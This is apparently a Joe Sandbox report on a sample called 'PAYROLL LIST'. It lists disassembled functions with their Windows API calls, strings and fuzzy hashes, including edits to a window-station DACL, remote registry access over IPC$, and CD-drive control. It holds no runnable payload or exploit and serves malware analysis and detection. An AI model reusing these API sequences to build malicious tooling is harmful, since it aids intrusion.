Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
String ID: .dll$.exe$.icl
API String ID: 1212759294-1154884017
Opcode ID: faae8e3ccb30706eeea7e420b5684818b5b42ec6a077386280235d6bb76f92f7
Instruction ID: d209267f1890d1d495a29e55c5640284a7e08afe3708f8873d9d06401d997005
Opcode Fuzzy Hash: faae8e3ccb30706eeea7e420b5684818b5b42ec6a077386280235d6bb76f92f7
Instruction Fuzzy Hash: FE61D171500216FAEB14EF64CD46FFE7BA8BF18714F104525F915E61D1EBB09980CB60

Function 00A6D219 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON

Download Yara Rule

APIs

Part of subcall function 00A2936C: __swprintf.LIBCMT ref: 00A293AB
Part of subcall function 00A2936C: __itow.LIBCMT ref: 00A293DF

CharLowerBuffW.USER32(?,?), ref: 00A6D292
GetDriveTypeW.KERNEL32 ref: 00A6D2DF
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00A6D327
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00A6D35E
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00A6D38C

Strings

open, xrefs: 00A6D2B9
close cd wait, xrefs: 00A6D377
set cd door , xrefs: 00A6D32D
wait, xrefs: 00A6D349
type cdaudio alias cd wait, xrefs: 00A6D30A
open , xrefs: 00A6D2EE
close, xrefs: 00A6D298
closed, xrefs: 00A6D2A6, 00A6D2AF

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: SendString$BuffCharDriveLowerType__itow__swprintf
String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
API String ID: 1148790751-4113822522
Opcode ID: 5b51c3391f9704731ead4fea5539269cffe0242e96e639ee81b9fb9766d8f56e
Instruction ID: e26ef7d47b4456daa290a3597ae5e60429f33f3c19d5efafac9c0de45ff3e57a
Opcode Fuzzy Hash: 5b51c3391f9704731ead4fea5539269cffe0242e96e639ee81b9fb9766d8f56e
Instruction Fuzzy Hash: 58512C71604315AFC700EF24D98196EB7F4FF98758F00496DF896672A1DB31AE06CB52

Function 00A626BC Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 137windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000016,00000000,?,?,00A93973,00000016,0000138C,00000016,?,00000016,00ABDDB4,00000000,?), ref: 00A626F1
LoadStringW.USER32(00000000,?,00A93973,00000016), ref: 00A626FA
GetModuleHandleW.KERNEL32(00000000,00000016,?,00000FFF,?,?,00A93973,00000016,0000138C,00000016,?,00000016,00ABDDB4,00000000,?,00000016), ref: 00A6271C
LoadStringW.USER32(00000000,?,00A93973,00000016), ref: 00A6271F
__swprintf.LIBCMT ref: 00A6276F
__swprintf.LIBCMT ref: 00A62780
_wprintf.LIBCMT ref: 00A62829
MessageBoxW.USER32(00000000,?,?,00011010), ref: 00A62840

Strings

Line %d (File "%s"):, xrefs: 00A62769
Line %d:, xrefs: 00A6277A
%s (%d) : ==> %s: %s %s, xrefs: 00A62824
Error: , xrefs: 00A627F7
^ ERROR, xrefs: 00A627D5

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: HandleLoadModuleString__swprintf$Message_wprintf
String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
API String ID: 618562835-2268648507
Opcode ID: 903f0bcbb0b7d78b8e34c97f04411c508108c78f55bbb3be770eee98063f1816
Instruction ID: 34dfa9f681a0f420b4da79461c57279f2361919ecb3634b4b43813dd5f0e3418
Opcode Fuzzy Hash: 903f0bcbb0b7d78b8e34c97f04411c508108c78f55bbb3be770eee98063f1816
Instruction Fuzzy Hash: 26413A72800229BACF14FBE4EE86EEEB778AF15340F100175B50277092EA746F59CB61

Function 00A6D0B8 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 101fileCOMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00A6D0D8
__swprintf.LIBCMT ref: 00A6D0FA
CreateDirectoryW.KERNEL32(?,00000000), ref: 00A6D137
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00A6D15C
_memset.LIBCMT ref: 00A6D17B
_wcsncpy.LIBCMT ref: 00A6D1B7
DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00A6D1EC
CloseHandle.KERNEL32(00000000), ref: 00A6D1F7
RemoveDirectoryW.KERNEL32(?), ref: 00A6D200
CloseHandle.KERNEL32(00000000), ref: 00A6D20A

Strings

\??\%s, xrefs: 00A6D0F4
:, xrefs: 00A6D11B
\, xrefs: 00A6D110

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
String ID: :$\$\??\%s
API String ID: 2733774712-3457252023
Opcode ID: 4c6db188b6402576e59dcb19a606be017dcc9c2d77cbde58d5401a57173f0481
Instruction ID: f196840b22da5bd7bd857de16ab92353b4683c4520e844a1e9b79910774bc993
Opcode Fuzzy Hash: 4c6db188b6402576e59dcb19a606be017dcc9c2d77cbde58d5401a57173f0481
Instruction Fuzzy Hash: FF31A676A0010AABDB21DFA0DC49FEB77BCEF89740F1041BAF509D61A0E7709645CB24

Function 00A8E731 Relevance: 22.6, APIs: 15, Instructions: 129filecommemoryCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00A8BEF4,?,?), ref: 00A8E754
GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00A8BEF4,?,?,00000000,?), ref: 00A8E76B
GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00A8BEF4,?,?,00000000,?), ref: 00A8E776
CloseHandle.KERNEL32(00000000,?,?,?,?,00A8BEF4,?,?,00000000,?), ref: 00A8E783
GlobalLock.KERNEL32(00000000), ref: 00A8E78C
ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,00A8BEF4,?,?,00000000,?), ref: 00A8E79B
GlobalUnlock.KERNEL32(00000000), ref: 00A8E7A4
CloseHandle.KERNEL32(00000000,?,?,?,?,00A8BEF4,?,?,00000000,?), ref: 00A8E7AB
CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00A8BEF4,?,?,00000000,?), ref: 00A8E7BC
OleLoadPicture.OLEAUT32(?,00000000,00000000,00AAD9BC,?), ref: 00A8E7D5
GlobalFree.KERNEL32(00000000), ref: 00A8E7E5
GetObjectW.GDI32(00000000,00000018,?), ref: 00A8E809
CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 00A8E834
DeleteObject.GDI32(00000000), ref: 00A8E85C
SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00A8E872

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
String ID:
API String ID: 3840717409-0
Opcode ID: d9df5cf6be91d341f30259b5983b4d956f88a51bc47cc0f6cb6c899e24b0e37a
Instruction ID: f1a598c0f998239e264d8c7808085d94f967143221d9117a978895dce42a025b
Opcode Fuzzy Hash: d9df5cf6be91d341f30259b5983b4d956f88a51bc47cc0f6cb6c899e24b0e37a
Instruction Fuzzy Hash: D9412775600205EFDB11EFA5DC88EAE7BB9EB8A715F108058F946972A0D730A942DB20

Function 00A705F8 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 230COMMON

Download Yara Rule

APIs

__wsplitpath.LIBCMT ref: 00A7076F
_wcscat.LIBCMT ref: 00A70787
_wcscat.LIBCMT ref: 00A70799
GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00A707AE
SetCurrentDirectoryW.KERNEL32(?), ref: 00A707C2
GetFileAttributesW.KERNEL32(?), ref: 00A707DA
SetFileAttributesW.KERNEL32(?,00000000), ref: 00A707F4
SetCurrentDirectoryW.KERNEL32(?), ref: 00A70806

Strings

*.*, xrefs: 00A70845

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
String ID: *.*
API String ID: 34673085-438819550
Opcode ID: e4c47c3e5c15e2bcb6f1746822b082927dc637347e2182a2111bea7c88d632fe
Instruction ID: 7dfef2ac80ff7572ddf45b4f883bb51818dbe9da3478b2a2423fd739afc23ebf
Opcode Fuzzy Hash: e4c47c3e5c15e2bcb6f1746822b082927dc637347e2182a2111bea7c88d632fe
Instruction Fuzzy Hash: 67816B71604301DFCB24EF64C955DAAB7E8BBD8304F18C82EF889D7251EB70E9558B92

Function 00A8EEEB Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00A3B34E: GetWindowLongW.USER32(?,000000EB), ref: 00A3B35F

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00A8EF3B
GetFocus.USER32 ref: 00A8EF4B
GetDlgCtrlID.USER32(00000000), ref: 00A8EF56
_memset.LIBCMT ref: 00A8F081
GetMenuItemInfoW.USER32 ref: 00A8F0AC
GetMenuItemCount.USER32(00000000), ref: 00A8F0CC
GetMenuItemID.USER32(?,00000000), ref: 00A8F0DF
GetMenuItemInfoW.USER32(00000000,-00000001,00000001,?), ref: 00A8F113
GetMenuItemInfoW.USER32(00000000,?,00000001,?), ref: 00A8F15B
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00A8F193
DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 00A8F1C8

Strings

0, xrefs: 00A8F079

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
String ID: 0
API String ID: 1296962147-4108050209
Opcode ID: d4a6363cd7082b379c00c9e719a9fc2849919d01375f8b7ad4ded750edae731b
Instruction ID: 8df768739688c1ea16a0b2a0a6ace89cfdf47ac7b1f095e7f5e8f03f9227960f
Opcode Fuzzy Hash: d4a6363cd7082b379c00c9e719a9fc2849919d01375f8b7ad4ded750edae731b
Instruction Fuzzy Hash: 09818F71604312EFD710EF54C988A6BBBE9FB89314F00462EFA9597291D730DD45CB62

Function 00A5A867 Relevance: 21.2, APIs: 14, Instructions: 178memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00A5ABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00A5ABD7
Part of subcall function 00A5ABBB: GetLastError.KERNEL32(?,00A5A69F,?,?,?), ref: 00A5ABE1
Part of subcall function 00A5ABBB: GetProcessHeap.KERNEL32(00000008,?,?,00A5A69F,?,?,?), ref: 00A5ABF0
Part of subcall function 00A5ABBB: HeapAlloc.KERNEL32(00000000,?,00A5A69F,?,?,?), ref: 00A5ABF7
Part of subcall function 00A5ABBB: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00A5AC0E

Part of subcall function 00A5AC56: GetProcessHeap.KERNEL32(00000008,00A5A6B5,00000000,00000000,?,00A5A6B5,?), ref: 00A5AC62
Part of subcall function 00A5AC56: HeapAlloc.KERNEL32(00000000,?,00A5A6B5,?), ref: 00A5AC69
Part of subcall function 00A5AC56: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00A5A6B5,?), ref: 00A5AC7A

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00A5A8CB
_memset.LIBCMT ref: 00A5A8E0
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00A5A8FF
GetLengthSid.ADVAPI32(?), ref: 00A5A910
GetAce.ADVAPI32(?,00000000,?), ref: 00A5A94D
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00A5A969
GetLengthSid.ADVAPI32(?), ref: 00A5A986
GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00A5A995
HeapAlloc.KERNEL32(00000000), ref: 00A5A99C
GetLengthSid.ADVAPI32(?,00000008,?), ref: 00A5A9BD
CopySid.ADVAPI32(00000000), ref: 00A5A9C4
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00A5A9F5
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00A5AA1B
SetUserObjectSecurity.USER32(?,00000004,?), ref: 00A5AA2F

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
String ID:
API String ID: 3996160137-0
Opcode ID: 448f898c25e409d4e9e34f403785b2f7ac1caf7925fa1a0f08e9a606f8cab9a1
Instruction ID: f377802ea367250dcc4358aa1e6770acdbf3fb81174e0883a7b099eae741965e
Opcode Fuzzy Hash: 448f898c25e409d4e9e34f403785b2f7ac1caf7925fa1a0f08e9a606f8cab9a1
Instruction Fuzzy Hash: 0E515F71A0020AAFDF10DF94DD45EEEBB79FF15301F04821AF956A7290DB359A0ACB61

Function 00A79DC1 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 159windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 00A79E36
CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 00A79E42
CreateCompatibleDC.GDI32(?), ref: 00A79E4E
SelectObject.GDI32(00000000,?), ref: 00A79E5B
StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00A79EAF
GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,?,00000000), ref: 00A79EEB
GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00A79F0F
SelectObject.GDI32(00000006,?), ref: 00A79F17
DeleteObject.GDI32(?), ref: 00A79F20
DeleteDC.GDI32(00000006), ref: 00A79F27
ReleaseDC.USER32(00000000,?), ref: 00A79F32

Strings

(, xrefs: 00A79ED7

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
String ID: (
API String ID: 2598888154-3887548279
Opcode ID: afc9bbfd4e84f5e3992339cef9752a9f9aec9f4c250e2b91010a87e6dab3533b
Instruction ID: b31b785ed7416964c3fe86f7650755dc1010e8dfef6b2af5d0a97d03e1df718e
Opcode Fuzzy Hash: afc9bbfd4e84f5e3992339cef9752a9f9aec9f4c250e2b91010a87e6dab3533b
Instruction Fuzzy Hash: 51513875A40309AFCB14CFA8CC85EAFBBB9EF49310F14C51EF99A97250C731A9418B50

Function 00A6CC5C Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 155COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF), ref: 00A6CCA3
LoadStringW.USER32(?,?,00000FFF,?), ref: 00A6CCC5
__swprintf.LIBCMT ref: 00A6CD1E
__swprintf.LIBCMT ref: 00A6CD37
_wprintf.LIBCMT ref: 00A6CDED
_wprintf.LIBCMT ref: 00A6CE0B

Strings

Line %d (File "%s"):, xrefs: 00A6CD18, 00A6CD31
"%s" (%d) : ==> %s:%s%s, xrefs: 00A6CDE8
Error: , xrefs: 00A6CDB5
^ ERROR, xrefs: 00A6CD8F
"%s" (%d) : ==> %s:, xrefs: 00A6CE06

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: LoadString__swprintf_wprintf
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
API String ID: 2889450990-2391861430
Opcode ID: a143a0e4120a9248fa9a022cfb0f380e11f0f2bb382380c488baaa8dcee0511e
Instruction ID: 4d80c23c00fa6edd27994e9fff0455dfdc8db7750addcb6af9670ce00868edb7
Opcode Fuzzy Hash: a143a0e4120a9248fa9a022cfb0f380e11f0f2bb382380c488baaa8dcee0511e
Instruction Fuzzy Hash: 0B517B72800129BADF15EBE4DE86EEEB778AF08310F100166F505771A2EB316F59DB61

Function 00A6CA48 Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 151COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF,00000016), ref: 00A6CA8F
LoadStringW.USER32(00000072,?,00000FFF,?), ref: 00A6CAB0
__swprintf.LIBCMT ref: 00A6CB09
__swprintf.LIBCMT ref: 00A6CB22
_wprintf.LIBCMT ref: 00A6CBCD
_wprintf.LIBCMT ref: 00A6CBEB

Strings

Line %d (File "%s"):, xrefs: 00A6CB03, 00A6CB1C
"%s" (%d) : ==> %s:%s%s, xrefs: 00A6CBC8
Error: , xrefs: 00A6CB95
"%s" (%d) : ==> %s:, xrefs: 00A6CBE6
^ ERROR , xrefs: 00A6CB64

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: LoadString__swprintf_wprintf
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
API String ID: 2889450990-3420473620
Opcode ID: d7dbcc9033113772e90a401b40c14b3929ff6d79d17973b165b0a905c4930eec
Instruction ID: 41b5c4137936b35eac3020ca0697a3a92768846ee8219df070eed0f6adf9f405
Opcode Fuzzy Hash: d7dbcc9033113772e90a401b40c14b3929ff6d79d17973b165b0a905c4930eec
Instruction Fuzzy Hash: 85518D32900229BACF15EBE4DE86EEEB778AF04310F100165B506730A2EB756F59DF61

Function 00A655BD Relevance: 19.7, APIs: 13, Instructions: 213windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00A655D7
GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 00A65664
GetMenuItemCount.USER32(00AE1708), ref: 00A656ED
DeleteMenu.USER32(00AE1708,00000005,00000000,000000F5,?,?), ref: 00A6577D
DeleteMenu.USER32(00AE1708,00000004,00000000), ref: 00A65785
DeleteMenu.USER32(00AE1708,00000006,00000000), ref: 00A6578D
DeleteMenu.USER32(00AE1708,00000003,00000000), ref: 00A65795
GetMenuItemCount.USER32(00AE1708), ref: 00A6579D
SetMenuItemInfoW.USER32(00AE1708,00000004,00000000,00000030), ref: 00A657D3
GetCursorPos.USER32(?), ref: 00A657DD
SetForegroundWindow.USER32(00000000), ref: 00A657E6
TrackPopupMenuEx.USER32(00AE1708,00000000,?,00000000,00000000,00000000), ref: 00A657F9
PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00A65805

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
String ID:
API String ID: 3993528054-0
Opcode ID: 930e1470d240e21511249b07063055955af736dea7fd0fa3998da3d7c04bbdee
Instruction ID: 26d4f83c570c57afa1fd9a91ffa61e605cd17a0e32b269e303ebfd181cf1e3b4
Opcode Fuzzy Hash: 930e1470d240e21511249b07063055955af736dea7fd0fa3998da3d7c04bbdee
Instruction Fuzzy Hash: 0771F474A40616BFEB209F64CC49FAABF75FF05368F280215F5156A1E1C7B16C10DB90

Function 00A5A14D Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 127registryshareCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00A5A1DC
WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00A5A211
RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00A5A22D
RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 00A5A249
RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00A5A273
CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 00A5A29B
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00A5A2A6
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00A5A2AB

Strings

SOFTWARE\Classes\, xrefs: 00A5A17D
\CLSID, xrefs: 00A5A193
\IPC$, xrefs: 00A5A1F3

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memset
String ID: SOFTWARE\Classes\$\CLSID$\IPC$
API String ID: 1687751970-22481851
Opcode ID: 05cd1fe735f1ea5dc014a18e71a938fbdd83a5553e269d8f900950fd49e77bd7
Instruction ID: 2fe1b0440d6dd36ba35fd2e5135ef7d9462d6721baa0b653d9a5ae931a4cdba7
Opcode Fuzzy Hash: 05cd1fe735f1ea5dc014a18e71a938fbdd83a5553e269d8f900950fd49e77bd7
Instruction Fuzzy Hash: 87410876D10229ABDF15EBA4ED85DEDB7B8FF18710F004129F902A31A1EB709E09CB50

